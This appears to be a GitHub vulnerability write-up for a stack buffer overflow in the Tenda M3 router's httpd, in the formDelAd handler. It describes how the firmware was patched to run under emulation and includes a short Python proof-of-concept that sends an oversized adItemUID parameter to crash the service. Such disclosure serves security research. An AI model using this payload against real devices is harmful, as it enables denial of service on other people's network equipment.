Skip to content

Latest commit

 

History

History

formDelAd

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Tenda M3 contains Stack Buffer Overflow Vulnerability

overview

Description

1. Vulnerability Details

the httpd in directory /bin has a buffer overflow. The vunlerability is in fucntion formDelAd

image-20220819153517143

In this function, it copies POST parameter adItemUID to stack buffer v6

If s is too long, it will causes dos(deny of service)

2. Recurring loopholes and POC

use qemu-arm-static to run the httpd, we need to patch it before run.

  • in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
  • The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data = {
    "adItemUID": "a"*0x2000
}
cookies = {
    "user": "admin"
}
res = requests.post("http://127.0.0.1/goform/delAd", data=data, cookies=cookies)
print(res.content)

image-20220819153543318

image-20220819153625861